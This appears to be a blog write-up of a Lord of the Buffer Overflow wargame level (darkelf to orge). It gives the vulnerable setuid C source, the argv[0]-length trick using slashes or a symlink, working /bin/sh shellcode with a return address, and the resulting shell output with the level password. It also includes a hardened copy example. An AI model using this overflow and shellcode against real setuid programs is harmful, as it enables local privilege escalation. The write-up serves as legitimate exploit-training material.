LEVEL7 (darkelf -> orge) : check argv[0]

argv[0] is just the file name, so what could the problem with it be?

 [darkelf@localhost darkelf]$ cat orge.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;

int main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // here is changed!
        if(strlen(argv[0]) != 77){
                printf("argv[0] error\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // shellcode hunter
        memset(buffer, 0, 40);
}


In the middle of the source there is a comment, `// here is changed!`.
If the file name is not exactly 77 characters long, the program exits. Since the hint was "check argv[0]", I expected the egghunter and buffer hunter to be gone, but they are still there. As before, the attack targets the argv[1] area; the only extra condition is that the file name must be 77 characters long.
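As an added example (not part of the original writeup or the LOB source), the argument check from orge.c placed next to a bounded version, plus the way a program on Linux can learn its own path without trusting argv[0]; the function names are my own.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Weak check, as in orge.c: the limit (48) is not derived from the 40-byte
 * buffer, so arguments of 41..48 bytes pass the check and overflow it.
 * Returns 0 when the copy was performed, -1 when the argument was rejected. */
int weak_copy(char *buffer, const char *arg)
{
    if (strlen(arg) > 48)
        return -1;
    strcpy(buffer, arg);
    return 0;
}

/* Hardened copy: the bound is the destination size, the NUL is counted,
 * and no byte beyond bufsz is read from arg. */
int safe_copy(char *buffer, size_t bufsz, const char *arg)
{
    const char *nul = memchr(arg, '\0', bufsz);
    if (nul == NULL)                 /* no terminator within bufsz: too long */
        return -1;
    memcpy(buffer, arg, (size_t)(nul - arg) + 1);
    return 0;
}

/* argv[0] is whatever the caller passed to execve(); on Linux a program that
 * needs its own path should read /proc/self/exe. Returns length or -1. */
ssize_t own_exe_path(char *out, size_t outsz)
{
    ssize_t n = readlink("/proc/self/exe", out, outsz - 1);
    if (n < 0)
        return -1;
    out[n] = '\0';
    return n;
}

int main(int argc, char *argv[])
{
    char buffer[40], exe[4096];

    if (argc < 2 || safe_copy(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument missing or too long!\n");
        return 1;
    }
    printf("%s\n", buffer);
    if (own_exe_path(exe, sizeof exe) > 0)
        printf("binary: %s, argv[0]: %s\n", exe, argv[0]);
    return 0;
}
```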

The attack method is the same as before; argv[0] can be written like this.

 [darkelf@localhost .izayoi]$ .////////////////////////////////////////////////////////////////////////orge `perl -e 'print "\xbf"x48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)
[darkelf@localhost .izayoi]$ gdb -c core -q
Core was generated by `.////////////////////////////////////////////////////////////////////////orge ¿'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb)

An attack of the form ../../../.././././../../ should also be possible (though that method would probably require adding the characters home/darkelf/orge).
I tried one more experiment, and the case below also seems to work (using a symbolic link).

[darkelf@localhost .izayoi]$ ln -s orge aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
[darkelf@localhost .izayoi]$ ls -al
total 92
drwxrwxr-x    2 darkelf  darkelf      4096 Jan 13 20:48 .
drwx------    3 darkelf  darkelf      4096 Jan 13 20:41 ..
lrwxrwxrwx    1 darkelf  darkelf         4 Jan 13 20:48 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -> orge
-rw-------    1 darkelf  darkelf     61440 Jan 13 20:44 core
-rwsr-sr-x    1 darkelf  darkelf     12700 Jan 13 20:42 orge
-rw-r--r--    1 darkelf  darkelf       701 Jan 13 20:42 orge.c
[darkelf@localhost .izayoi]$ ./aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa `perl -e 'print "\xbf"x48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)

Since the attack method is already known and the problem is similar to the previous one, I will skip a separate gdb analysis.

[darkelf@localhost darkelf]$ .////////////////////////////////////////////////////////////////////////orge `perl -e 'print "\x90"x20,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80","\x9c\xfb\xff\xbf"'`
1ÀPh//shh/bin‰ãPS‰á™°
                     Í€œûÿ¿
bash$ id
uid=506(darkelf) gid=506(darkelf) euid=507(orge) egid=507(orge) groups=506(darkelf)
bash$ my-pass
euid = 507
timewalker

[darkelf@localhost darkelf]$ ./aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa `perl -e 'print "\x90"x20,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80","\x98\xfb\xff\xbf"'`
1ÀPh//shh/bin‰ãPS‰á™°
                     Í€˜ûÿ¿
bash$ id
uid=506(darkelf) gid=506(darkelf) euid=507(orge) egid=507(orge) groups=506(darkelf)
bash$ my-pass
euid = 507
timewalker

Both methods obtained the password.
Posted by john@memory :